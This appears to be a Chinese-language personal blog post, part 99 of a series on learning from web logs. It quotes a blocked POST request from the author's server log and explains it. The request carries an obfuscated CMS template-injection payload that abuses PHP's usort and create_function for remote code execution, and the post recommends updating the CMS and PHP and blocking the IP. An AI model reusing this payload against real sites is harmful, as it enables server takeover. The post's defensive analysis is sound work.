Wey's note: 從 Web Log 學習系統漏洞 99

2025年11月28日星期五

從 Web Log 學習系統漏洞 99

weblog中的一段記錄:

154.36.180.143 - - [25/Nov/2025:20:32:58 +0800] "POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1" 403 299 "http://www.w-studio.idv.tw/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB7.0 (.NET CLR 3.5.30729)"

奇怪的是這來源 IP一個說在日本, 一個說在美國?? 或者只是一個跳板? 而且還攻擊了好幾天

經過查詢後得知這是一個利用 CMS漏洞中 PHP函式 usort及 create_function的遠端注入程式碼執行(RCE)攻擊, 而且還使用假的 User-Agent(Firefox/3.5.8, Windows XP)來欺騙檢查, 解決方式就是更新 CMS, PHP, 並將此 IP封鎖

Wey's note

2025年11月28日星期五

從 Web Log 學習系統漏洞 99

沒有留言:

張貼留言

2025年11月28日 星期五

從 Web Log 學習系統漏洞 99

沒有留言:

張貼留言

2025年11月28日星期五